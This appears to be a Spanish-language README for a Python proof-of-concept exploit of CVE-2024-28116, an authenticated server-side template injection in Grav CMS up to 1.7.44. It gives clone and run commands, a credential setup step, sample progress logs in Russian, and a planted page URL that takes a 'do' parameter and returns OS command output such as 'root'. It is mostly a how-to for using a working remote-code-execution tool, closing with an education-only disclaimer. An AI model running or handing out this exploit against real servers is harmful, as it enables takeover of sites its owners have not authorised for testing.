
es un script Python PoC que explota una vulnerabilidad de inyección de plantillas en el lado del servidor (SSTI) autenticada en Grav CMS versiones <= 1.7.44 (CVE-2024-28116)
GenGravSSTIExploit es un script PoC en Python que explota una vulnerabilidad autenticada de inyección de plantillas del lado del servidor (SSTI) en Grav CMS versiones <= 1.7.44 (CVE-2024-28116). Esta vulnerabilidad permite a un usuario con permisos de editor ejecutar comandos del SO en un servidor remoto.
Nota: Este script requiere credenciales válidas para autenticarse en la consola de Grav CMS.
requests (instalar con pip install requests)Clonar el repositorio
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Configurar credenciales
Edita el script para proporcionar tus credenciales de editor de Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Ejecutar el script
Usa el siguiente comando para ejecutar el script:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: URL objetivo en el formato http[s]://hostname.<PORT>: Número de puerto (por defecto 80).Ejemplo:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Interactuar con el exploit
Si el exploit tiene éxito, recibirás una URL donde podrás ejecutar comandos del SO:
[+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
El script realizará cada paso, proporcionándote actualizaciones a través del terminal. Esto es lo que podrías ver:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
Después de que el script termine, verás un mensaje con el enlace a la página inyectada. Puedes visitar este enlace para ejecutar comandos del SO
http://example.com:8080/poc_4T7B?do=whoami
Visitar la URL con el comando especificado mostrará la salida directamente en la página:
Cmd-Output:
root
Esta herramienta está destinada únicamente para fines educativos. Úsala de manera responsable y solo en sistemas donde tengas permiso explícito. El autor no se hace responsable de ningún uso indebido o daño causado por este script.